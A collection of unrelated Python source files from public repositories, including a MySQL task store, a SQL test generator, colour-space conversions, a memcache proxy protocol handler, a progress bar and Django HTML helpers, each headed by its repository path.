def _create_project(self, project):
assert re.match(r'^\w+$', project) is not None
tablename = self._tablename(project)
if tablename in [x[0] for x in self._execute('show tables')]:
return
self._execute('''CREATE TABLE IF NOT EXISTS %s (
`taskid` varchar(64) PRIMARY KEY,
`project` varchar(64),
`url` varchar(1024),
`status` int(1),
`schedule` BLOB,
`fetch` BLOB,
`process` BLOB,
`track` BLOB,
`lastcrawltime` double(16, 4),
`updatetime` double(16, 4),
INDEX `status_index` (`status`)
) ENGINE=InnoDB CHARSET=utf8''' % self.escape(tablename))
def _parse(self, data):
for key, value in list(six.iteritems(data)):
if isinstance(value, (bytearray, six.binary_type)):
data[key] = utils.text(value)
for each in ('schedule', 'fetch', 'process', 'track'):
if each in data:
if data[each]:
data[each] = json.loads(data[each])
else:
data[each] = {}
return data
def _stringify(self, data):
for each in ('schedule', 'fetch', 'process', 'track'):
if each in data:
data[each] = json.dumps(data[each])
return data
def load_tasks(self, status, project=None, fields=None):
if project and project not in self.projects:
return
where = "`status` = %s" % self.placeholder
if project:
projects = [project, ]
else:
projects = self.projects
for project in projects:
tablename = self._tablename(project)
for each in self._select2dic(
tablename, what=fields, where=where, where_values=(status, )
):
yield self._parse(each)
def get_task(self, project, taskid, fields=None):
if project not in self.projects:
self._list_project()
if project not in self.projects:
return None
where = "`taskid` = %s" % self.placeholder
tablename = self._tablename(project)
for each in self._select2dic(tablename, what=fields, where=where, where_values=(taskid, )):
return self._parse(each)
return None
def status_count(self, project):
result = dict()
if project not in self.projects:
self._list_project()
if project not in self.projects:
return result
tablename = self._tablename(project)
for status, count in self._execute("SELECT `status`, count(1) FROM %s GROUP BY `status`" %
self.escape(tablename)):
result[status] = count
return result
def insert(self, project, taskid, obj={}):
if project not in self.projects:
self._list_project()
if project not in self.projects:
self._create_project(project)
self._list_project()
obj = dict(obj)
obj['taskid'] = taskid
obj['project'] = project
obj['updatetime'] = time.time()
tablename = self._tablename(project)
return self._insert(tablename, **self._stringify(obj))
def update(self, project, taskid, obj={}, **kwargs):
if project not in self.projects:
self._list_project()
if project not in self.projects:
raise LookupError
tablename = self._tablename(project)
obj = dict(obj)
obj.update(kwargs)
obj['updatetime'] = time.time()
return self._update(
tablename,
where="`taskid` = %s" % self.placeholder,
where_values=(taskid, ),
**self._stringify(obj)
)
|
vimfiles/bundle/vim-python/submodules/pylint/tests/functional/m/member/member_checks_typed_annotations.py
|
ciskoinch8/vimrc
| 463 |
75318
|
# pylint: disable=missing-docstring,invalid-name,too-few-public-methods
class A:
myfield: int
class B(A):
pass
class C:
pass
class D(C, B):
pass
a = A()
print(a.myfield)
b = B()
print(b.myfield)
d = D()
print(d.myfield)
c = C()
print(c.myfield) # [no-member]
|
src/include/catalog/li_extras.py
|
wapache-org/greenplum-gpdb
| 5,535 |
75324
|
#! /usr/local/bin/python
import sys
import datetime
import pdb
#pdb.set_trace()
# Test and declaration generator for linear_interpolation
# Utility
def kwot(s):
"""Single quote a string, doubling contained quotes as needed."""
return "'" + "''".join(s.split("'")) + "'"
# Following section is just fragile helper functions to produce triples
# of values (v0, v, v1) such that, for any choice of scale and transform
# (scale applied first, transform last):
#
# (v-v0)/(v1-v) = p1/p2
#
# The idea is that, by keeping p1 and p2 uniform in a test set, we can
# know the result of linear interpolation independently of the actual
# function linear_interpolate and include it in the regressions to make
# it easy to identify issues.
def int_triple(p1, p2, scale, transform):
return tuple( [x*scale + transform for x in [0, p1, p1+p2]] )
def num_triple(p1, p2, scale, transform):
return tuple( [str(x) for x in int_triple(p1, p2, scale, transform)] )
def date_triple(p1, p2, scale, transform, basedate):
i = int_triple(p1, p2, scale, transform)
g = basedate.toordinal()
d = [datetime.date.fromordinal(x + g) for x in i]
return tuple( [kwot(x.isoformat()) for x in d] )
def time_offset_by_minutes(t, d):
x = t.hour * 60 + t.minute + d
h = x / 60
m = x - 60 * h
h = h - 24 * (h / 24)
return datetime.time(hour = h, minute = m)
def time_triple(p1, p2, scale, transform, basetime):
i = int_triple(p1, p2, scale, transform)
t = [ time_offset_by_minutes(basetime, x) for x in i]
return tuple( [kwot(x.isoformat()) for x in t] )
def datetime_triple(p1, p2, scale, transform, basestamp):
i = int_triple(p1, p2, scale, transform)
d = [ datetime.timedelta(minutes=x) for x in i ]
return [ kwot( (basestamp + x).isoformat() ) for x in d]
def interval_triple(p1, p2, scale, transform, baseminutes):
i = int_triple(p1, p2, scale, transform+baseminutes)
return tuple( [ kwot(str(x) + ' minutes') for x in i ] )
# The following table drives tests and declarations per data type.
# The keys are type SQL type names that are known to cattulus.pl.
# The values are tuples of
# - a 3-tuple of values in SQL form (no casts): low, middle, high.
# - a 3-tuple of proportionally spread values like the first.
# - an appropriate C type declarator (beware Interval's pointer-ness).
# - position as in index into array of types.
#
# The position value in important to ensure OID consistency.
#
# The delta values fix the proportions of the 3-tuple values.
delta1 = 1
delta2 = 4
type_dict = {
'int8' : (
num_triple(delta1, delta2, 100, 100),
num_triple(delta1, delta2, 50, 2000),
'int64',
0),
'int4' : (
num_triple(delta1, delta2, 100, 100),
num_triple(delta1, delta2, 50, 2000),
'int32',
1),
'int2' : (
num_triple(delta1, delta2, 100, 100),
num_triple(delta1, delta2, 50, 2000),
'int2',
2),
'float8' : (
num_triple(delta1, delta2, 100, 100),
num_triple(delta1, delta2, 50, 2000),
'float8',
3),
'float4' : (
num_triple(delta1, delta2, 100, 100),
num_triple(delta1, delta2, 50, 2000),
'float4',
4),
'date' : (
date_triple(delta1, delta2, 10, 10, datetime.date(2001, 1, 1)),
date_triple(delta1, delta2, 10, 20, datetime.date(2010, 1, 1)),
'DateADT',
5),
'time' : (
time_triple(delta1, delta2, 5, 20, datetime.time(hour=10)),
time_triple(delta1, delta2, 10, 300, datetime.time(hour=10)),
'TimeADT',
6),
'timestamp' : (
datetime_triple(delta1, delta2, 1000, 2000, datetime.datetime(2010, 1, 1)),
datetime_triple(delta1, delta2, 5000, 1000, datetime.datetime(2012, 6, 1)),
'Timestamp',
7),
'timestamptz' : (
datetime_triple(delta1, delta2, 1000, 2000, datetime.datetime(2010, 1, 1)),
datetime_triple(delta1, delta2, 5000, 1000, datetime.datetime(2012, 6, 1)),
'TimestampTz',
8),
'interval' : (
interval_triple(delta1, delta2, 20, 10, 55),
interval_triple(delta1, delta2, 10, 20, 30),
'Interval',
9),
'numeric' : (
num_triple(delta1, delta2, 100, 100),
num_triple(delta1, delta2, 50, 2000),
'Numeric',
10),
}
# For OID assignment we choose to order the types and assign ascending
# OID values starting from a base. The caller is responsible for setting
# base and maintaining the order of assignment.
oid_base = 6072
def ordered_types():
"""List of types in canonical order of OID assignment."""
keys = type_dict.keys()
ordered_keys = [None for k in keys]
for key in keys:
pos = type_dict[key][3]
ordered_keys[pos] = key
assert not None in ordered_keys
return ordered_keys
# Convenient wrapper for one of the table's 3-tuples.
class Coordinate(object):
def __init__(self, ctype, lmhtuple):
self._type = ctype
(self._low, self._mid, self._high) = lmhtuple
def low(self):
return self._low + '::' + self._type
def mid(self):
return self._mid + '::' + self._type
def high(self):
return self._high + '::' + self._type
def linear_interpolate(x, y, x0, y0, x1, y1):
"""Format a call to linear_interpolate for the given arguments and expected result.
"""
fmt = """
select
linear_interpolate({x}, {x0}, {y0}, {x1}, {y1}),
{y} as answer,
{y} = linear_interpolate({x}, {x0}, {y0}, {x1}, {y1}) as match ;"""
return fmt.format(x=x, y=y, x0=x0, y0=y0, x1=x1, y1=y1)
def preliminary_tests(verbose):
""" Preliminary tests (SQL), optionally verbose, as '\n'-delimited string.
"""
prelim = """
-- A "generic" unsupported type.
select linear_interpolate('x'::text, 'x0'::text, 0, 'x1'::text, 1000);
select linear_interpolate(5, 0, 'y0'::text, 100, 'y1'::text);
-- Check that "divide by zero" returns null"""
prelim = prelim.split('\n')
fmt = """select linear_interpolate({x}, {x0}, {y0}, {x1}, {y1});"""
for t in type_dict:
a = Coordinate(t, type_dict[t][0])
o = Coordinate('int4', type_dict['int4'][1])
s = fmt.format(x=a.mid(), x0=a.low(), y0=o.low(), x1=a.low(), y1=o.high())
prelim = prelim + s.split('\n')
return '\n'.join(prelim)
def basic_tests(abscissa_type, ordinate_type, verbose):
"""Per-type tests (SQL), optionally verbose, as '\n'-delimited string.
"""
abscissa = Coordinate(abscissa_type, type_dict[abscissa_type][0])
ordinate = Coordinate(ordinate_type, type_dict[ordinate_type][1])
if verbose:
lst = [
'',
'\qecho',
'\qecho Check interpolation correctness: %s --> %s' % (abscissa_type, ordinate_type),
]
prolog = []
else:
lst = []
prolog = [
'',
'',
'-- Abscissa: %s, Ordinate: %s' % (abscissa_type, ordinate_type),
'-- Check correctness - all results should have match = t'
]
# Use the triples in all combinations to test outlying cases as well as "sweet
# spot" cases.
tst = linear_interpolate(
abscissa.mid(), ordinate.mid(),
abscissa.low(), ordinate.low(),
abscissa.high(), ordinate.high() )
lst = lst + tst.split('\n')
tst = linear_interpolate(
abscissa.mid(), ordinate.mid(),
abscissa.high(), ordinate.high(),
abscissa.low(), ordinate.low() )
lst = lst + tst.split('\n')
tst = linear_interpolate(
abscissa.low(), ordinate.low(),
abscissa.mid(), ordinate.mid(),
abscissa.high(), ordinate.high() )
lst = lst + tst.split('\n')
tst = linear_interpolate(
abscissa.low(), ordinate.low(),
abscissa.high(), ordinate.high(),
abscissa.mid(), ordinate.mid() )
lst = lst + tst.split('\n')
tst = linear_interpolate(
abscissa.high(), ordinate.high(),
abscissa.mid(), ordinate.mid(),
abscissa.low(), ordinate.low() )
lst = lst + tst.split('\n')
tst = linear_interpolate(
abscissa.high(), ordinate.high(),
abscissa.low(), ordinate.low(),
abscissa.mid(), ordinate.mid() )
lst = lst + tst.split('\n')
# Include one trivial case
tst = linear_interpolate(
abscissa.mid(), ordinate.mid(),
abscissa.mid(), ordinate.mid(),
abscissa.mid(), ordinate.mid() )
lst = lst + tst.split('\n')
return '\n'.join(prolog + lst)
def all_tests(verbose):
result = preliminary_tests(verbose)
for abscissa_type in type_dict:
result = result + basic_tests(abscissa_type, 'int4', verbose)
for ordinate_type in type_dict:
result = result + basic_tests('int4', ordinate_type, verbose)
return result
def regression_tests():
return all_tests(False)
def readable_tests():
return all_tests(True)
declared_description = 'linear interpolation: x, x0,y0, x1,y1'
def pg_proc_declarations():
template = """
CREATE FUNCTION linear_interpolate(
anyelement,
anyelement,
{T},
anyelement,
{T}
)
RETURNS {T}
LANGUAGE internal IMMUTABLE STRICT
AS 'linterp_{t}'
WITH (OID={oid}, DESCRIPTION="{desc}");"""
result = ['-- for cdb_pg/src/include/catalog/pg_proc.sql', '']
fmt = ' '.join([x.strip() for x in template.split('\n')])
next_oid = oid_base
all_types = ordered_types()
for sql_type in all_types:
c_type = type_dict[sql_type][2]
result = result + [fmt.format(T=sql_type, t=c_type, oid=str(next_oid), desc=declared_description)]
next_oid = next_oid + 1
return '\n'.join(result)
def upgrade_declarations():
upgrade_1 = """
CREATE FUNCTION @[email protected]_interpolate(
anyelement,
anyelement,
{T},
anyelement,
{T}
)
RETURNS {T}
LANGUAGE internal IMMUTABLE STRICT
AS 'linterp_{t}'
WITH (OID={oid}, DESCRIPTION="{desc}");"""
upgrade_2 = """
COMMENT ON FUNCTION @[email protected]_interpolate(
anyelement,
anyelement,
{T},
anyelement,
{T}
)
IS '{desc}';"""
result = ['-- for src/test/regress/data/upgradeXX/upg2_catupgrade_XXX.sql.in', '']
upg_1 = ' '.join([x.strip() for x in upgrade_1.split('\n')])
upg_2 = ' '.join([x.strip() for x in upgrade_2.split('\n')])
next_oid = oid_base
all_types = ordered_types()
for sql_type in all_types:
c_type = type_dict[sql_type][2]
result.append( upg_1.format(T=sql_type, t=c_type, oid=str(next_oid), desc=declared_description) )
result.append( upg_2.format(T=sql_type, t=c_type, oid=str(next_oid), desc=declared_description) )
result.append( '' )
next_oid = next_oid + 1
return '\n'.join(result)
#
# Interpret the arguments, write result to standard out.
def main():
argmap = {
'readable' : readable_tests,
'regression' : regression_tests,
'pg_proc' : pg_proc_declarations,
'upgrade' : upgrade_declarations
}
efmt = 'argument must be one of (%s), not "%s"' % (', '.join(argmap.keys()), "%s")
if len(sys.argv) == 1:
fn = argmap['readable']
elif len(sys.argv) == 2 and sys.argv[1] in argmap:
fn = argmap[sys.argv[1]]
else:
sys.exit(efmt % ' '.join(sys.argv[1:]))
print fn()
if __name__ == '__main__':
main()
|
pyzx/graph/graph.py
|
mnm-team/pyzx-heuristics
| 219 |
75336
|
# PyZX - Python library for quantum circuit rewriting
# and optimization using the ZX-calculus
# Copyright (C) 2018 - <NAME> and <NAME>
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import Optional
from .base import BaseGraph
from .graph_s import GraphS
try:
import quizx # type: ignore
except ImportError:
quizx = None
backends = { 'simple': True, 'quizx-vec': True }
def Graph(backend:Optional[str]=None) -> BaseGraph:
"""Returns an instance of an implementation of :class:`~pyzx.graph.base.BaseGraph`.
By default :class:`~pyzx.graph.graph_s.GraphS` is used.
Currently ``backend`` is allowed to be `simple` (for the default),
or 'graph_tool' and 'igraph'.
This method is the preferred way to instantiate a ZX-diagram in PyZX.
Example:
To construct an empty ZX-diagram, just write::
g = zx.Graph()
"""
if backend is None: backend = 'simple'
if backend not in backends:
raise KeyError("Unavailable backend '{}'".format(backend))
if backend == 'simple': return GraphS()
if backend == 'graph_tool':
return GraphGT()
if backend == 'igraph': return GraphIG()
if backend == 'quizx-vec': return quizx.VecGraph() # type: ignore
return GraphS()
Graph.from_json = GraphS.from_json # type: ignore
Graph.from_tikz = GraphS.from_tikz # type: ignore
try:
import graph_tool.all as gt
from .graph_gt import GraphGT
backends['graph_tool'] = gt
except ImportError:
pass
try:
import igraph as ig
from .graph_ig import GraphIG
backends['igraph'] = ig
except ImportError:
pass
|
Hard/same-bsts.py
|
SaumyaRai2010/algoexpert-data-structures-algorithms
| 152 |
75344
|
# SAME BSTS
# O(N^2) time and space
def sameBsts(arrayOne, arrayTwo):
# Write your code here.
if len(arrayOne) != len(arrayTwo):
return False
if len(arrayOne) == 0:
return True
if arrayOne[0] != arrayTwo[0]:
return False
leftSubtreeFirst = [num for num in arrayOne[1:] if num < arrayOne[0]]
rightSubtreeFirst = [num for num in arrayOne[1:] if num >= arrayOne[0]]
leftSubtreeSecond = [num for num in arrayTwo[1:] if num < arrayTwo[0]]
rightSubtreeSecond = [num for num in arrayTwo[1:] if num >= arrayTwo[0]]
return sameBsts(leftSubtreeFirst, leftSubtreeSecond) and sameBsts(rightSubtreeFirst, rightSubtreeSecond)
# O(N^2) time and O(d) space
def sameBsts(arrayOne, arrayTwo):
# Write your code here.
return areSameBsts(arrayOne, arrayTwo, 0, 0, float('-inf'), float('inf'))
def areSameBsts(arrayOne, arrayTwo, rootIdxOne, rootIdxTwo, minVal, maxVal):
if rootIdxOne == -1 or rootIdxTwo == -1:
return rootIdxOne == rootIdxTwo
if arrayOne[rootIdxOne] != arrayTwo[rootIdxTwo]:
return False
leftRootIdxOne = getIdxOfFirstSmaller(arrayOne, rootIdxOne, minVal)
leftRootIdxTwo = getIdxOfFirstSmaller(arrayTwo, rootIdxTwo, minVal)
rightRootIdxOne = getIdxOfFirstBiggerOrEqual(arrayOne, rootIdxOne, maxVal)
rightRootIdxTwo = getIdxOfFirstBiggerOrEqual(arrayTwo, rootIdxTwo, maxVal)
currentValue = arrayOne[rootIdxOne]
leftAreSame = areSameBsts(arrayOne, arrayTwo, leftRootIdxOne, leftRootIdxTwo, minVal, currentValue)
rightAreSame = areSameBsts(arrayOne, arrayTwo, rightRootIdxOne, rightRootIdxTwo, currentValue, maxVal)
return leftAreSame and rightAreSame
def getIdxOfFirstSmaller(array, startingIdx, minVal):
for i in range(startingIdx + 1, len(array)):
if array[i] < array[startingIdx] and array[i] >= minVal:
return i
return -1
def getIdxOfFirstBiggerOrEqual(array, startingIdx, maxVal):
for i in range(startingIdx + 1, len(array)):
if array[i] >= array[startingIdx] and array[i] < maxVal:
return i
return -1
|
colour/models/rgb/hanbury2003.py
|
rift-labs-developer/colour
| 1,380 |
75354
|
<gh_stars>1000+
# -*- coding: utf-8 -*-
"""
IHLS Colour Encoding
====================
Defines the :math:`IHLS` (Improved HLS) colourspace related transformations:
- :func:`colour.RGB_to_IHLS`
- :func:`colour.IHLS_to_RGB`
References
----------
- :cite:`Hanbury2003` : <NAME>. (2003). A 3D-Polar Coordinate Colour
Representation Well Adapted to Image Analysis. In <NAME> & <NAME>
(Eds.), Image Analysis (pp. 804–811). Springer Berlin Heidelberg.
ISBN:978-3-540-45103-7
"""
import numpy as np
from colour.algebra import vector_dot
from colour.utilities import (from_range_1, to_domain_1, tstack, tsplit, zeros)
__author__ = 'Colour Developers'
__copyright__ = 'Copyright (C) 2013-2021 - Colour Developers'
__license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause'
__maintainer__ = 'Colour Developers'
__email__ = '<EMAIL>'
__status__ = 'Production'
__all__ = ['RGB_to_IHLS', 'IHLS_to_RGB']
MATRIX_RGB_TO_YC_1_C_2 = np.array([
[0.2126, 0.7152, 0.0722],
[1, -0.5, -0.5],
[0, -np.sqrt(3) / 2, np.sqrt(3) / 2],
])
"""
*RGB* colourspace to *YC_1C_2* colourspace matrix.
MATRIX_RGB_TO_YC_1_C_2 : array_like, (3, 3)
"""
MATRIX_YC_1_C_2_TO_RGB = np.linalg.inv(MATRIX_RGB_TO_YC_1_C_2)
"""
*YC_1C_2* colourspace to *RGB* colourspace matrix.
MATRIX_YC_1_C_2_TO_RGB : array_like, (3, 3)
"""
def RGB_to_IHLS(RGB):
"""
Converts from *RGB* colourspace to *IHLS* (Improved HLS) colourspace.
Parameters
----------
RGB : array-like
*RGB* colourspace array.
Returns
-------
ndarray
*HYS* colourspace array.
Notes
-----
+------------+-----------------------+---------------+
| **Domain** | **Scale - Reference** | **Scale - 1** |
+============+=======================+===============+
| ``RGB`` | [0, 1] | [0, 1] |
+------------+-----------------------+---------------+
+------------+-----------------------+---------------+
| **Range** | **Scale - Reference** | **Scale - 1** |
+============+=======================+===============+
| ``HYS`` | [0, 1] | [0, 1] |
+------------+-----------------------+---------------+
References
----------
:cite:`Hanbury2003`
Examples
--------
>>> RGB = np.array([0.45595571, 0.03039702, 0.04087245])
>>> RGB_to_IHLS(RGB) # doctest: +ELLIPSIS
array([ 6.2616051..., 0.1216271..., 0.4255586...])
"""
RGB = to_domain_1(RGB)
R, G, B = tsplit(RGB)
Y, C_1, C_2 = tsplit(vector_dot(MATRIX_RGB_TO_YC_1_C_2, RGB))
C = np.sqrt(C_1 ** 2 + C_2 ** 2)
acos_C_1_C_2 = zeros(C.shape)
acos_C_1_C_2[C != 0] = np.arccos(C_1[C != 0] / C[C != 0])
H = np.where(C_2 <= 0, acos_C_1_C_2, (np.pi * 2) - acos_C_1_C_2)
S = np.maximum(np.maximum(R, G), B) - np.minimum(np.minimum(R, G), B)
HYS = tstack([H, Y, S])
return from_range_1(HYS)
def IHLS_to_RGB(HYS):
"""
Converts from *IHLS* (Improved HLS) colourspace to *RGB* colourspace.
Parameters
----------
HYS : array-like
*IHLS* colourspace array.
Returns
-------
ndarray
*RGB* colourspace array.
Notes
-----
+------------+-----------------------+---------------+
| **Domain** | **Scale - Reference** | **Scale - 1** |
+============+=======================+===============+
| ``HYS`` | [0, 1] | [0, 1] |
+------------+-----------------------+---------------+
+------------+-----------------------+---------------+
| **Range** | **Scale - Reference** | **Scale - 1** |
+============+=======================+===============+
| ``RGB`` | [0, 1] | [0, 1] |
+------------+-----------------------+---------------+
References
----------
:cite:`Hanbury2003`
Examples
--------
>>> HYS = np.array([6.26160518, 0.12162712, 0.42555869])
>>> IHLS_to_RGB(HYS) # doctest: +ELLIPSIS
array([ 0.4559557..., 0.0303970..., 0.0408724...])
"""
H, Y, S = tsplit(to_domain_1(HYS))
pi_3 = np.pi / 3
k = np.floor(H / (pi_3))
H_s = H - k * (pi_3)
C = (np.sqrt(3) * S) / (2 * np.sin((2 * pi_3) - H_s))
C_1 = C * np.cos(H)
C_2 = -C * np.sin(H)
RGB = vector_dot(MATRIX_YC_1_C_2_TO_RGB, tstack([Y, C_1, C_2]))
return from_range_1(RGB)
|
vaurien/protocols/memcache.py
|
mozilla-libs/vaurien
| 131 |
75387
|
<reponame>mozilla-libs/vaurien<gh_stars>100-1000
import re
from vaurien.protocols.base import BaseProtocol
from vaurien.util import chunked
RE_LEN = re.compile('Content-Length: (\d+)', re.M | re.I)
RE_KEEPALIVE = re.compile('Connection: Keep-Alive')
RE_MEMCACHE_COMMAND = re.compile('(.*)\r\n')
EOH = '\r\n\r\n'
CRLF = '\r\n'
class Memcache(BaseProtocol):
"""Memcache protocol.
"""
name = 'memcache'
def _handle(self, source, dest, to_backend, on_between_handle):
# https://github.com/memcached/memcached/blob/master/doc/protocol.txt
# Sending the query
buffer = self._get_data(source)
if not buffer:
self._abort_handling(to_backend, dest)
return
# sending the first packet
dest.sendall(buffer)
on_between_handle()
# finding the command we sent.
cmd = RE_MEMCACHE_COMMAND.search(buffer)
if cmd is None:
# wat ?
self._abort_handling(to_backend, dest)
return
# looking at the command
cmd = cmd.groups()[0]
buffer_size = self.option('buffer')
cmd_parts = cmd.split()
mcmd = cmd_parts[0]
if mcmd in ('set', 'add', 'replace', 'append'):
cmd_size = len(cmd) + len(CRLF)
data_size = int(cmd_parts[-1])
total_size = cmd_size + data_size
# grabbing more data if needed
left_to_read = total_size - len(buffer) + len(CRLF)
if left_to_read > 0:
for chunk in chunked(left_to_read, buffer_size):
data = source.recv(chunk)
buffer += data
dest.sendall(data)
# Receiving the response now
buffer = self._get_data(dest, buffer_size)
source.sendall(buffer)
if buffer.startswith('VALUE'):
# we're getting back a value.
EOW = 'END' + CRLF
else:
EOW = CRLF
while not buffer.endswith(EOW):
data = self._get_data(dest, buffer_size)
buffer += data
source.sendall(data)
# we're done
return True # keeping connected
|
dataset_preprocessing/generate_OF_FDD.py
|
malikhussain72/cnn_fall-detection
| 183 |
75402
|
import os
import cv2
import glob
import sys
sys.path.append('/usr/local/lib/python2.7/site-packages/')
#os.system('/home/adrian/dense_flow/build/extract_cpu -f={} -x={} -y={} -i=tmp/image -b 20 -t 1 -d 3 -o=dir'.format('test.avi', '/flow_x', '/flow_y'))
data_folder = 'FDD_images/'
output_path = 'FDD_OF/'
i = 0
if not os.path.exists(output_path):
os.mkdir(output_path)
folders = [f for f in os.listdir(data_folder) if os.path.isdir(os.path.join(data_folder, f))]
folders.sort()
for folder in folders:
event_folders = [f for f in os.listdir(data_folder + folder) if os.path.isdir(os.path.join(data_folder + folder + '/', f))]
event_folders.sort()
for event_folder in event_folders:
path = data_folder + folder + '/' + event_folder
flow = output_path + folder + '/' + event_folder
if not os.path.exists(flow):
os.makedirs(flow)
os.system('/home/anunez/dense_flow2/build/extract_cpu -f={} -x={} -y={} -i=tmp/image -b=20 -t=1 -d=0 -s=1 -o=dir'.format(path, flow + '/flow_x', flow + '/flow_y'))
|
toad/utils/progress.py
|
wolaituodiban/toad
| 325 |
75446
|
import sys
from time import time
class Progress:
"""
"""
def __init__(self, iterable, size = None, interval = 0.1):
"""
Args:
iterable
size (int): max size of iterable
interval (float): update bar interval second, default is `0.1`
Attrs:
BAR_LENGTH (int): bar length, default is `32`
SYMBOL_DONE (str): symbol indicating complation
SYMBOL_REST (str): symbol indicating remaining
prefix (str): string template before progress bar
suffix (str): string template after progress bar
template (str): string template for rendering, `{prefix} {bar} {suffix}`
"""
self.iterable = iterable
self.interval = interval
self.batch = 1
self.size = size
if hasattr(iterable, '__len__'):
self.size = len(iterable)
# is pytorch dataloader
if hasattr(iterable, 'batch_size'):
self.batch = getattr(iterable, 'batch_size')
self.size = len(iterable.dataset)
self.idx = 0
self.time = None
self.BAR_LENGTH = 32
self.SYMBOL_DONE = '█'
self.SYMBOL_REST = '.'
self.prefix = ""
self.suffix = ""
if self.size is None:
self.template = "{prefix} {done} iters {time:.2f}s {suffix}"
else:
self.template = "{prefix} {percent:3.0f}%|{bar}| [{done}/{size}] {time:.2f}s {suffix}"
def __len__(self):
return self.size
def __iter__(self):
self.reset()
# reset time
start = time()
last_time = start
for item in self.iterable:
yield item
self.idx += 1
curr_time = time()
self.time = curr_time - start
# skip update if delta is too small
if curr_time - last_time < self.interval:
continue
last_time = curr_time
# update bar
self.flush()
# finally updating for the status of end
self.flush()
self.end()
def reset(self):
# reset index
self.idx = 0
def end(self):
self.print('\n')
def flush(self):
if self.size is None:
done = self.idx * self.batch
percent = 0
bar = None
else:
done = min(self.idx * self.batch, self.size)
percent = done / self.size
bar = (self.SYMBOL_DONE * int(percent * self.BAR_LENGTH)).ljust(self.BAR_LENGTH, self.SYMBOL_REST)
self.print('\r' + self.template.format(
percent = percent * 100,
bar = bar,
done = done,
size = self.size,
time = self.time,
tps = done / self.time,
prefix = self.prefix,
suffix = self.suffix,
))
def print(self, text):
sys.stdout.write(text)
sys.stdout.flush()
|
hacker-rank/algorithms/strings/two-strings/two-strings.py
|
palash24/algorithms
| 113 |
75478
|
<reponame>palash24/algorithms<gh_stars>100-1000
#!/usr/bin/env python
import sys
def char_set(string):
chars = {}
for c in string:
chars[c] = True
return chars
def test_case():
A = sys.stdin.readline().strip()
B = sys.stdin.readline().strip()
bCharSet = char_set(B)
for c in A:
if (c in bCharSet):
print("YES")
return
print("NO")
def main():
T = int(sys.stdin.readline())
while (T > 0):
test_case()
T -= 1
if __name__ == '__main__':
main()
|
virtual/lib/python3.8/site-packages/django_bootstrap5/html.py
|
Calebu6214/Instagram-clone
| 118 |
75494
|
<reponame>Calebu6214/Instagram-clone
from django.forms.utils import flatatt
from django.utils.html import format_html
from django_bootstrap5.text import text_value
from django_bootstrap5.utils import get_url_attrs
def render_script_tag(url):
"""Build a script tag."""
return render_tag("script", get_url_attrs(url, attr_name="src"))
def render_link_tag(url):
"""Build a link tag."""
attrs = get_url_attrs(url, attr_name="href")
attrs["rel"] = "stylesheet"
return render_tag("link", attrs=attrs, close=False)
def render_tag(tag, attrs=None, content=None, close=True):
"""Render an HTML tag."""
attrs_string = flatatt(attrs) if attrs else ""
builder = "<{tag}{attrs}>{content}"
content_string = text_value(content)
if content_string or close:
builder += "</{tag}>"
return format_html(builder, tag=tag, attrs=attrs_string, content=content_string)
|
src/visitpy/visit_flow/visit_flow_vpe/examples/flow_vpe_pyocl_compile_dw_mag.py
|
visit-dav/vis
| 226 |
75496
|
# Copyright (c) Lawrence Livermore National Security, LLC and other VisIt
# Project developers. See the top-level LICENSE file for dates and other
# details. No copyright assignment is required to contribute to VisIt.
"""
file: vpe_flow_npy_ops_example_1.py
author: <NAME> <<EMAIL>>
created: 3/28/2012
description:
vpe flow example demonstrating use of flow.filters.npy_ops.
"""
from flow import *
from flow.filters import pyocl_compile
def setup_workspace():
w = Workspace()
w.register_filters(pyocl_compile)
ctx = w.add_context("pyocl_compile","root")
ctx.start()
ctx.add_filter("decompose","dwdx",{"index":0})
ctx.add_filter("decompose","dwdy",{"index":1})
ctx.add_filter("decompose","dwdz",{"index":2})
ctx.add_filter("grad","dw")
ctx.add_filter("mult","vx_sq")
ctx.add_filter("mult","vy_sq")
ctx.add_filter("mult","vz_sq")
ctx.add_filter("add","v_add_1")
ctx.add_filter("add","v_add")
ctx.add_filter("sqrt","v_sqrt")
ctx.connect(":vz","dw:in")
ctx.connect(":dims","dw:dims")
ctx.connect(":x","dw:x")
ctx.connect(":y","dw:y")
ctx.connect(":z","dw:z")
ctx.connect("dw","dwdx:in")
ctx.connect("dw","dwdy:in")
ctx.connect("dw","dwdz:in")
ctx.connect("dwdx","vx_sq:in_a")
ctx.connect("dwdx","vx_sq:in_b")
ctx.connect("dwdy","vy_sq:in_a")
ctx.connect("dwdy","vy_sq:in_b")
ctx.connect("dwdz","vz_sq:in_a")
ctx.connect("dwdz","vz_sq:in_b")
ctx.connect("vx_sq","v_add_1:in_a")
ctx.connect("vy_sq","v_add_1:in_b")
ctx.connect("v_add_1","v_add:in_a")
ctx.connect("vz_sq","v_add:in_b")
ctx.connect("v_add","v_sqrt:in")
return w
|
skift/__init__.py
|
dimidd/skift
| 244 |
75502
|
<reponame>dimidd/skift
"""Utilities for pandas."""
from .core import FirstColFtClassifier # noqa: F401
from .core import IdxBasedFtClassifier # noqa: F401
from .core import FirstObjFtClassifier # noqa: F401
from .core import ColLblBasedFtClassifier # noqa: F401
from .core import SeriesFtClassifier # noqa: F401
from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
for name in ['get_versions', '_version', 'core', 'name']:
try:
globals().pop(name)
except KeyError:
pass
|
sbin/submitty_daemon_jobs/submitty_jobs/bulk_qr_split.py
|
zeez2030/Submitty
| 411 |
75505
|
#!/usr/bin/env python3
"""Split PDFS by QR code and move images and PDFs to correct folder."""
import os
import traceback
import numpy
from . import write_to_log as logger
from . import submitty_ocr as scanner
# try importing required modules
try:
from PyPDF2 import PdfFileReader, PdfFileWriter
from pdf2image import convert_from_bytes
import pyzbar.pyzbar as pyzbar
from pyzbar.pyzbar import ZBarSymbol
import cv2
except ImportError:
traceback.print_exc()
raise ImportError("One or more required python modules not installed correctly")
def main(args):
"""Scan through PDF and split PDF and images."""
filename = args[0]
split_path = args[1]
qr_prefix = args[2]
qr_suffix = args[3]
log_file_path = args[4]
use_ocr = args[5]
buff = "Process " + str(os.getpid()) + ": "
try:
os.chdir(split_path)
pdfPages = PdfFileReader(filename)
pdf_writer = PdfFileWriter()
i = id_index = 0
